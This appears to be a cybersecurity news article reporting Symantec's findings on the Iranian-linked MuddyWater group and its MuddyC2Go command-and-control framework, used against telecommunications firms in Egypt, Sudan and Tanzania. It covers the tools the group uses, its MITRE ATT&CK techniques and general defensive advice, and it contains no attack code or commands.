A recent cybersecurity alert has revealed that the Iranian state-sponsored hacking group known as MuddyWater has deployed a newly identified command-and-control framework named MuddyC2Go, targeting the telecommunications sectors in Egypt, Sudan, and Tanzania. Detectives at Broadcom’s Symantec Threat Hunter Team are monitoring this group under the designation Seedworm, but they have also been recognized by several other aliases including Boggy Serpens and Mango Sandstorm.
MuddyWater’s operations have been noted since 2017, with intelligence suggesting its connections to Iran’s Ministry of Intelligence and Security (MOIS). The group’s primary focus has historically been on entities within the Middle East, now extending its reach to Africa. The emergence of MuddyC2Go has raised concerns, as this Golang-based C2 framework replaces the older PhonyC2 and carries potential signs of earlier utilization, dating back to at least 2020.
The functionality of MuddyC2Go includes an embedded PowerShell script that initiates connections to the attackers’ control server without requiring direct human intervention. Noteworthy is the recent activity from November 2023, where operational chains employed tools such as SimpleHelp and Venom Proxy, in addition to custom-built keyloggers that were critical in the breaches.
In its targeted attacks, the MuddyWater group typically leverages phishing emails and exploits known vulnerabilities found in unpatched applications to gain initial access. Once within a system, they conduct reconnaissance, lateral movement, and data exfiltration. Evidence gathered by Symantec indicates that the group used the MuddyC2Go launcher to establish communication with command servers while deploying legitimate remote access tools like AnyDesk and SimpleHelp.
The group’s tactics, techniques, and procedures (TTPs), as indexed by the MITRE ATT&CK framework, suggest they employ initial access techniques through phishing campaigns and exploitation of vulnerabilities (T1566, T1203). Once inside a network, they demonstrate persistence (T1105) using tools that facilitate remote access, indicating a sophisticated approach that aims to prolong their presence within compromised networks.
In another incident reported by Symantec, an unnamed telecommunications firm fell victim to a similar compromise where MuddyWater’s activities were facilitated through prolonged use of SimpleHelp—once previously exploited in earlier attacks during 2023 where key payloads such as JumpCloud remote access software were deployed.
The ongoing escalation of these threats is underscored by other regional developments; in recent weeks, the Israeli-aligned group Gonjeshke Darande has claimed attacks disrupting gas supply networks in Iran, responding to regional tensions. This cyber conflict illustrates a growing trend of state-sponsored cyber activities which could have significant implications for businesses operating in or with connections to affected regions.
As organizations contend with increasingly complex cyber threats, the use of PowerShell remains a controversial point of vulnerability, emphasizing the need for heightened monitoring and proactive defensive strategies to mitigate risks associated with unauthorized exploitation of these tools. Businesses must maintain vigilance and ensure systems are updated, as well as educate staff on recognizing phishing attempts to strengthen their overall cybersecurity posture.
